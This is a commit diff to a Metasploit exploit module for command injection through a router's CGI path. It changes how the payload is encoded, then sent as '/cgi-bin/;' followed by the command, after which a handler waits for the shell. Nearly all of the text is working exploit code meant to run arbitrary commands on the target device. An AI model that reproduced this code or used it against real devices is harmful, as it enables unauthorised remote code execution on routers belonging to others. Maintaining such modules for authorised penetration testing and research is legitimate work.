Carter
GitHub
parent
3fac632ce1
commit
63d1de9acd
|
|
@ -38,8 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'DisableNops' => true
|
||||
#'EncoderType' => Msf::Encoder::Type::CmdUnixIfs,
|
||||
'DisableNops' => true,
|
||||
'BadChars' => "\x20"
|
||||
}
|
||||
))
|
||||
|
||||
|
|
@ -81,16 +81,16 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# Mostly from ddwrt_cgibin_exec.rb, it's essentially the same exploit
|
||||
def exploit
|
||||
is_vuln = check
|
||||
cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join
|
||||
str = "echo${IFS}-ne${IFS}\"#{cmd}\"|/bin/sh&"
|
||||
cmd = payload.encoded # .unpack("C*").map{|c| "\\x%.2x" % c}.join
|
||||
#str = "echo${IFS}-ne${IFS}\"#{cmd}\"|/bin/sh&"
|
||||
|
||||
print_status('Sending encoded command...')
|
||||
vprint_status("Encoded command: #{str}")
|
||||
send_request_raw({ 'uri' => "/cgi-bin/;#{str}" })
|
||||
vprint_status("Encoded command: #{cmd}")
|
||||
send_request_cgi({ 'uri' => "/cgi-bin/;#{cmd}" })
|
||||
|
||||
print_status('Giving the handler time to run...')
|
||||
handler
|
||||
|
||||
select(nil, nil, nil, 10.0)
|
||||
sleep(10)
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue